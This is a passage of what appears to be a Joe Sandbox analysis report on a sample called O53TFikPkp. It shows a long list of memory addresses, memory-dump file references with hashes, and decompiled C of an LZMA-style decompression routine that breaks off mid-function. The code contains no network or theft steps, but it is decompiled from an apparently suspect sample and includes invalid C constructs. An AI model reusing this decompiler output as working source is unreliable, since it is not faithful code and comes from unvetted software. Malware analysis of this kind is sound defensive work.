                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x00000000
                                                                                            0x00406776
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406481
                                                                                            0x00406484
                                                                                            0x00406487
                                                                                            0x00406489
                                                                                            0x0040648b
                                                                                            0x0040648b
                                                                                            0x0040648c
                                                                                            0x0040648f
                                                                                            0x00406496
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040678c
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x00000000
                                                                                            0x004068c8
                                                                                            0x00406796
                                                                                            0x00406799
                                                                                            0x0040679c
                                                                                            0x004067a0
                                                                                            0x004067a3
                                                                                            0x004067a9
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00406818
                                                                                            0x0040681b
                                                                                            0x00406820
                                                                                            0x00406821
                                                                                            0x00406823
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x0040673a
                                                                                            0x00406734
                                                                                            0x004067ba
                                                                                            0x004067c0
                                                                                            0x004067c3
                                                                                            0x004067c6
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067d8
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x004067fa
                                                                                            0x004067fd
                                                                                            0x00406801
                                                                                            0x00406803
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067e5
                                                                                            0x004067ea
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x0040680a
                                                                                            0x00406811
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000
                                                                                            0x004068e7
                                                                                            0x00406734
                                                                                            0x004066bb
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x0040640d

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                                                                                            • Instruction ID: b59dca7a73cfed8a049a6b6a8b4acb584d685fa01604791ee1d6e054a78b3619
                                                                                            • Opcode Fuzzy Hash: 26fed0205269c67c4524460d7550c555d61838a406f219378ffc8409cc06287b
                                                                                            • Instruction Fuzzy Hash: 08714671D04229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7789996DF54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E00406355() {
                                                                                            				unsigned short _t531;
                                                                                            				signed int _t532;
                                                                                            				void _t533;
                                                                                            				signed int _t534;
                                                                                            				signed int _t535;
                                                                                            				signed int _t565;
                                                                                            				signed int _t568;
                                                                                            				signed int _t589;
                                                                                            				signed int* _t606;
                                                                                            				void* _t613;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                            						 *(_t613 - 0x84) = 0xa;
                                                                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                            					} else {
                                                                                            						 *(__ebp - 0x84) = 9;
                                                                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            					}
                                                                                            					while(1) {
                                                                                            						 *(_t613 - 0x54) = _t606;
                                                                                            						while(1) {
                                                                                            							L133:
                                                                                            							_t531 =  *_t606;
                                                                                            							_t589 = _t531 & 0x0000ffff;
                                                                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                            							if( *(_t613 - 0xc) >= _t565) {
                                                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                            								 *(_t613 - 0x40) = 1;
                                                                                            								_t532 = _t531 - (_t531 >> 5);
                                                                                            								 *_t606 = _t532;
                                                                                            							} else {
                                                                                            								 *(_t613 - 0x10) = _t565;
                                                                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                            							}
                                                                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                            								goto L139;
                                                                                            							}
                                                                                            							L137:
                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                            								 *(_t613 - 0x88) = 5;
                                                                                            								L170:
                                                                                            								_t568 = 0x22;
                                                                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                            								_t535 = 0;
                                                                                            								L172:
                                                                                            								return _t535;
                                                                                            							}
                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                            							L139:
                                                                                            							_t533 =  *(_t613 - 0x84);
                                                                                            							while(1) {
                                                                                            								 *(_t613 - 0x88) = _t533;
                                                                                            								while(1) {
                                                                                            									L1:
                                                                                            									_t534 =  *(_t613 - 0x88);
                                                                                            									if(_t534 > 0x1c) {
                                                                                            										break;
                                                                                            									}
                                                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                                                                            										case 0:
                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            											_t534 =  *( *(_t613 - 0x70));
                                                                                            											if(_t534 > 0xe1) {
                                                                                            												goto L171;
                                                                                            											}
                                                                                            											_t538 = _t534 & 0x000000ff;
                                                                                            											_push(0x2d);
                                                                                            											asm("cdq");
                                                                                            											_pop(_t570);
                                                                                            											_push(9);
                                                                                            											_pop(_t571);
                                                                                            											_t609 = _t538 / _t570;
                                                                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                            											asm("cdq");
                                                                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                            											 *(_t613 - 0x3c) = _t604;
                                                                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                            												L10:
                                                                                            												if(_t612 == 0) {
                                                                                            													L12:
                                                                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            													goto L15;
                                                                                            												} else {
                                                                                            													goto L11;
                                                                                            												}
                                                                                            												do {
                                                                                            													L11:
                                                                                            													_t612 = _t612 - 1;
                                                                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                            												} while (_t612 != 0);
                                                                                            												goto L12;
                                                                                            											}
                                                                                            											if( *(_t613 - 4) != 0) {
                                                                                            												GlobalFree( *(_t613 - 4));
                                                                                            											}
                                                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            											 *(_t613 - 4) = _t534;
                                                                                            											if(_t534 == 0) {
                                                                                            												goto L171;
                                                                                            											} else {
                                                                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                            												goto L10;
                                                                                            											}
                                                                                            										case 1:
                                                                                            											L13:
                                                                                            											__eflags =  *(_t613 - 0x6c);
                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                            												 *(_t613 - 0x88) = 1;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                            											_t45 = _t613 - 0x48;
                                                                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                            											__eflags =  *_t45;
                                                                                            											L15:
                                                                                            											if( *(_t613 - 0x48) < 4) {
                                                                                            												goto L13;
                                                                                            											}
                                                                                            											_t546 =  *(_t613 - 0x40);
                                                                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                            												L20:
                                                                                            												 *(_t613 - 0x48) = 5;
                                                                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                            												goto L23;
                                                                                            											}
                                                                                            											 *(_t613 - 0x74) = _t546;
                                                                                            											if( *(_t613 - 8) != 0) {
                                                                                            												GlobalFree( *(_t613 - 8));
                                                                                            											}
                                                                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                            											 *(_t613 - 8) = _t534;
                                                                                            											if(_t534 == 0) {
                                                                                            												goto L171;
                                                                                            											} else {
                                                                                            												goto L20;
                                                                                            											}
                                                                                            										case 2:
                                                                                            											L24:
                                                                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                            											 *(_t613 - 0x84) = 6;
                                                                                            											 *(_t613 - 0x4c) = _t553;
                                                                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                            											 *(_t613 - 0x54) = _t606;
                                                                                            											goto L133;
                                                                                            										case 3:
                                                                                            											L21:
                                                                                            											__eflags =  *(_t613 - 0x6c);
                                                                                            											if( *(_t613 - 0x6c) == 0) {
                                                                                            												 *(_t613 - 0x88) = 3;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                            											_t67 = _t613 - 0x70;
                                                                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                            											__eflags =  *_t67;
                                                                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                            											L23:
                                                                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                            											if( *(_t613 - 0x48) != 0) {
                                                                                            												goto L21;
                                                                                            											}
                                                                                            											goto L24;
                                                                                            										case 4:
                                                                                            											L133:
                                                                                            											_t531 =  *_t606;
                                                                                            											_t589 = _t531 & 0x0000ffff;
                                                                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                            											if( *(_t613 - 0xc) >= _t565) {
                                                                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                            												 *(_t613 - 0x40) = 1;
                                                                                            												_t532 = _t531 - (_t531 >> 5);
                                                                                            												 *_t606 = _t532;
                                                                                            											} else {
                                                                                            												 *(_t613 - 0x10) = _t565;
                                                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                            											}
                                                                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                            												goto L139;
                                                                                            											}
                                                                                            										case 5:
                                                                                            											goto L137;
                                                                                            										case 6:
                                                                                            											__edx = 0;
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                            												while(1) {
                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                            											__cl = 8;
                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            											__ecx =  *(__ebp - 4);
                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                            													_t98 = __ebp - 0x38;
                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                            													__eflags =  *_t98;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            												}
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                            												__ebx = 0;
                                                                                            												__ebx = 1;
                                                                                            												goto L61;
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
                                                                                            												__ecx =  *(__ebp - 8);
                                                                                            												__ebx = 0;
                                                                                            												__ebx = 1;
                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            												goto L41;
                                                                                            											}
                                                                                            										case 7:
                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            												__eax = 0;
                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            												__al = __al & 0x000000fd;
                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                            												__eflags = __eax;
                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                            												goto L69;
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 4);
                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                            											while(1) {
                                                                                            												 *(_t613 - 0x54) = _t606;
                                                                                            												goto L133;
                                                                                            											}
                                                                                            										case 8:
                                                                                            											goto L0;
                                                                                            										case 9:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												goto L89;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                            												goto L171;
                                                                                            											}
                                                                                            											__eax = 0;
                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            											__eflags = _t258;
                                                                                            											0 | _t258 = _t258 + _t258 + 9;
                                                                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                            											goto L75;
                                                                                            										case 0xa:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                            												while(1) {
                                                                                            													 *(_t613 - 0x54) = _t606;
                                                                                            													goto L133;
                                                                                            												}
                                                                                            											}
                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                            											goto L88;
                                                                                            										case 0xb:
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            											} else {
                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            											L88:
                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            											L89:
                                                                                            											__eax =  *(__ebp - 4);
